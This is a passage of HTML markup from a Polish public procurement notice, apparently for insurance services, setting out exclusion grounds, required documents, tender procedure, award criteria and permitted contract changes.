podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca w takiej sytuacji musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1.1.	W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania, na żądanie Zamawiającego, które to wezwanie ma charakter uprawnienia Zamawiającego, a nie jego obowiązku, Wykonawca przedkłada:1.1.1.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 14) ustawy PZP, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.1.1.2.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 21) ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 1.1.3.	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1) ustawy PZP.1.2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:1.2.1.	w pkt. 1.1.1. - składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 14) ustawy PZP;1.2.2.	w pkt. 1.1.2. - składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 21) ustawy PZP;1.2.3.	w pkt 1.1.3. - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.1.3.	Dokumenty, o których mowa w pkt. 1.2. powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.1.4.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 1.2., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Dokumenty, o których mowa powyżej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.1.5.	Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w pkt. 1.1.1, składa dokument, o którym mowa w pkt. 1.2.1., w zakresie określonym w art. 24 ust. 1 pkt 14) ustawy PZP. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby. Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.1.6.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienie brak podstaw do wykluczenia z postępowania powinien wykazać każdy z Wykonawców.1.7.	Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia. Zamawiający żąda od Wykonawcy, który polega na zdolnościach innych podmiotów na zasadach kreślonych w art. 22a ustawy PZP, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 1.1.1. - 1.1.3.1.8.	Jeżeli zdolności techniczne lub zawodowe nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda, aby Wykonawca w terminie określonym przez zamawiającego:1.8.1.	zastąpił ten podmiot innym podmiotem lub podmiotami lub1.8.2.	zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe.1.9.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.1.10.	Ocena spełnienia warunków udziału w postępowaniu (rozumianych jako brak podstaw do wykluczenia z postępowania) dokonywana będzie według formuły ,,spełnia", ,,nie spełnia" z zastrzeżeniem art. 26 ust. 3 ustawy PZP na podstawie dokumentów i oświadczeń przedstawionych przez Wykonawcę.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1.1.	W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu, na żądanie Zamawiającego, które to wezwanie ma charakter uprawnienia Zamawiającego, a nie jego obowiązku, Wykonawca przedkłada (dotyczy każdej z Części zamówienia):1.1.1.	w celu wykazania spełniania warunku udziału w postępowaniu dotyczącego kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:(a)	Zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej w zakresie zgodnym z przedmiotem zamówienia lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów zaświadczenie właściwego organu nadzoru, że Wykonawca prowadzi działalność ubezpieczeniową w wymaganym zakresie lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów oświadczenie organu uprawnionego do reprezentowania wykonawcy, że prowadzi on działalność ubezpieczeniową w wymaganym zakresie i nie jest konieczne posiadanie przez niego zezwolenia wraz z przytoczeniem podstawy prawnej. Jeżeli wykonawca ma siedzibę poza terytorium Rzeczypospolitej Polskiej dodatkowo składa potwierdzenie faktu notyfikacji otrzymane od organu nadzoru, a jeżeli organ nadzoru w kraju wykonawcy takiego potwierdzenia nie dostarcza, wykonawca składa oświadczenie organu uprawnionego do reprezentowania wykonawcy, iż notyfikacja została dokonana i przyjęta przez polski organ nadzoru.Wyjaśnienie:Wykonawca, który nie jest obowiązany do posiadania zezwolenia, może złożyć zaświadczenie organu nadzoru lub oświadczenie organu reprezentującego.Wykonawca prowadzący działalność ubezpieczeniową na podstawie posiadanego zezwolenia właściwego organu nie może złożyć zamiast tego zezwolenia zaświadczenia organu nadzoru lub oświadczenia organu uprawnionego do reprezentowania Wykonawcy.1.1.2.	w celu wykazania spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej:(a)	z uwagi na to, że treść informacji przekazanych przez Wykonawcę na Oświadczeniu Wstępnym, odpowiadać będzie zakresowi informacji, których Zamawiający może wymagać poprzez żądanie złożenia oświadczenia o dysponowaniu jednostki organizacyjnej prowadzącej likwidację szkód, odstępuje się od żądania złożenia odrębnego oświadczenia w tym zakresie.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Na ofertę Wykonawcy składają się następujące dokumenty: 1.1. Formularz oferty, która może zostać sporządzona zgodnie ze wzorem stanowiącym Załącznik Nr 2 do SIWZ. 1.2. Oświadczenie Wykonawcy o którym mowa w SEKCJI III.3., które może zostać sporządzone zgodnie ze wzorem stanowiącym Załącznik Nr 4 do SIWZ. 1.3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego, które mogą zostać sporządzone zgodnie z wzorami stanowiącymi Załącznik Nr 3 do SIWZ. 1.4. Zobowiązanie podmiotu trzeciego, lub inny dokument służący wykazaniu udostępniania Wykonawcy potencjału przez podmiot trzeci w zakresie określonym w art. 22 ust. 1 ustawy, jeżeli Wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów. Zobowiązanie może zostać sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 7 do SIWZ. 1.5. Ogólne (Szczególne) Warunki Ubezpieczenia lub inne wzorce umowne, które będą miały zastosowanie do poszczególnych ubezpieczeń lub w ofercie należy wyraźnie wskazać, które ze wzorców umownych stosowanych w powszechnym obrocie przez Wykonawcę i możliwych do identyfikacji przez Zamawiającego mają zastosowanie do poszczególnych ubezpieczeń. 2. W przypadku dokonania wyboru najkorzystniejszej oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed podpisaniem umowy należy przedłożyć umowę regulującą współpracę tych podmiotów (np. umowa konsorcjum, umowa spółki cywilnej). 3. W celu zweryfikowania czy Wykonawca należy do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2017 poz. 229 ze zm.), Wykonawca w terminie 3 dni od zamieszczenia przez Zamawiającego na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy (informacja z otwarcia ofert) przedkłada oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena (składka ubezpieczeniowa)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>95,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>warunki ubezpieczenia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zamawiający przewiduje możliwość istotnej zmiany postanowień umowy w stosunku do treści złożonej w postępowaniu oferty (w tym w szczególności zmiany dotyczącej wzajemnych świadczeń stron umowy ubezpieczenia), w przypadku, gdy wystąpi:1)	sytuacja, w której Wykonawca wprowadzi do obrotu w czasie trwania umowy ubezpieczenia zmiany do stosowanych przez niego wzorców umownych, z zastrzeżeniem, że w odniesieniu do niniejszej umowy ubezpieczenia możliwe jest wprowadzenie jedynie zmian na korzyść Zamawiającego,2)	zmiana w obowiązujących przepisach prawa mająca wpływ na świadczenie usługi będącej przedmiotem niniejszego postępowania dostosowująca warunki umowy ubezpieczenia do zmian w przepisach prawa,3)	zmiana na rynku ubezpieczeniowym, z zastrzeżeniem, że w odniesieniu do niniejszej umowy ubezpieczenia możliwe jest wprowadzenie jedynie zmian na korzyść Zamawiającego,4)	doubezpieczenia, podwyższenia lub obniżenia pod/limitów w okresie ubezpieczenia, rozszerzenia lub zawężenia zakresu ubezpieczenia lub zmianę innych elementów Umowy oraz rozliczenia i aktualizacji składek ubezpieczeniowych (w tym rat składek) z nią związanych, które to sytuacje nie stanowią realizacji postanowień umowy ubezpieczenia - w przypadku zidentyfikowania i uzasadnienia przez Zamawiającego potrzeby dokonania takiej zmiany.2.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.3.	Wszystkie przypadki, określone w pkt. 1, stanowią katalog istotnych zmian, na których dokonanie w umowie Zamawiający oraz Wykonawca mogą wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody ani przez Zamawiającego ani przez Wykonawcę.4.	W sytuacji, gdy w trakcie okresu ubezpieczenia zajdą następujące zmiany:?	stawki podatku od towarów i usług,?	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz.U. z 2017 r., poz. 847),?	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotnektóre mają wpływ na koszty wykonania zamówienia przez wykonawcę, wynagrodzenie należne Wykonawcy zostanie w sposób odpowiadający powyższym zmianom zwaloryzowane. Wykonawca wnioskując do Zamawiającego o dokonanie zmian wynagrodzenia na tej podstawie jest zobowiązany udowodnić, w jaki sposób powyższe zmiany wpływają na koszty wykonania przez niego zamówienia. W sytuacji, gdy jest bezspornym, że powyższe zmiany mają wpływ na koszty wykonania zamówienia przez Wykonawcę, następuje zmiana postanowień umowy dotyczących wynagrodzenia Wykonawcy w formie pisemnej pod rygorem nieważności.</span> <br/> <b>IV.6) INFORMACJE 